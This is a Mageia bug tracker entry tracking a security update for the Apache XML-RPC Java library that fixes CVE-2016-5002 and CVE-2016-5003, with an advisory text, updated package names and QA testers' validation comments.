| Summary: | xmlrpc new security issues CVE-2016-500[23] | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | critical | ||
| Priority: | Normal | CC: | herman.viaene, lewyssmith, sysadmin-bugs, tarazed25 |
| Version: | 6 | Keywords: | advisory, validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | MGA6-32-OK MGA6-64-OK | ||
| Source RPM: | xmlrpc-3.1.3-70.mga6.src.rpm | CVE: | |
| Status comment: | Patches available from Fedora | ||
|
Description
David Walser
2018-06-01 14:35:03 CEST
David Walser
2018-06-01 14:35:10 CEST
Whiteboard:
(none) =>
MGA6TOO Fedora has issued an advisory for this on June 2: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5AEMJ2ZNFZVGVMACAZMQQCBOFBVUTNZA/ There was also another CVE. Summary:
xmlrpc new security issue CVE-2016-5003 =>
xmlrpc new security issues CVE-2016-500[23] Fixed in xmlrpc-3.1.3-73.mga7 in Cauldron. Whiteboard:
MGA6TOO =>
(none) Advisory: ======================== Updated xmlrpc packages fix security vulnerabilities: XML external entity (XXE) vulnerability in the Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted DTD (CVE-2016-5002). A flaw was discovered in the Apache XML-RPC (ws-xmlrpc) library that deserializes untrusted data when enabledForExtensions setting is enabled. A remote attacker could use this vulnerability to execute arbitrary code via a crafted serialized Java object in a <ex:serializable> element (CVE-2016-5003). References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5002 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5003 https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5AEMJ2ZNFZVGVMACAZMQQCBOFBVUTNZA/ ======================== Updated packages in core/updates_testing: ======================== xmlrpc-javadoc-3.1.3-70.1.mga6 xmlrpc-common-3.1.3-70.1.mga6 xmlrpc-client-3.1.3-70.1.mga6 xmlrpc-server-3.1.3-70.1.mga6 from xmlrpc-3.1.3-70.1.mga6.src.rpm Assignee:
java =>
qa-bugs Could not find anything useful for QA testing in the CVE links. Have no idea how to start the|a client or server or what ws-xmlrpc means. Handing this one over to whomsoever. $ locate xmlrpc-client /usr/share/java/xmlrpc-client.jar /usr/share/maven-metadata/xmlrpc-xmlrpc-client.xml /usr/share/maven-poms/xmlrpc-client.pom $ locate xmlrpc | grep jar /usr/share/java/xmlrpc-client.jar /usr/share/java/xmlrpc-common.jar /usr/share/java/xmlrpc-server.jar /usr/share/java/pycharm-community/lib/xmlrpc-2.0.1.jar # java -jar /usr/share/java/xmlrpc-client.jar no main manifest attribute, in /usr/share/java/xmlrpc-client.jar CC:
(none) =>
tarazed25 Just a clean update will do. MGA6-32 MATE on IBM Thinkpad R50e No installation issues, so according Comment 5, it's OK. Just for the curious, I found a "simple" example at https://www.tutorialspoint.com/xml-rpc/xml_rpc_examples.htm but that over my head, someone else more educated in java might find it interesting enough. Whiteboard:
(none) =>
MGA6-32-OK (In reply to David Walser from comment #5) > Just a clean update will do. On M6/6 did just that; unsure exactly what Len & Herman had done. BEFORE update, installed: xmlrpc-server-3.1.3-70.mga6 xmlrpc-client-3.1.3-70.mga6 xmlrpc-javadoc-3.1.3-70.mga6 xmlrpc-common-3.1.3-70.mga6 The UPDATE was seamless: xmlrpc-server-3.1.3-70.1.mga6 xmlrpc-client-3.1.3-70.1.mga6 xmlrpc-javadoc-3.1.3-70.1.mga6 xmlrpc-common-3.1.3-70.1.mga6 Validating; advisory from comment 3. Whiteboard:
MGA6-32-OK =>
MGA6-32-OK MGA6-64-OK An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2019-0002.html Status:
NEW =>
RESOLVED |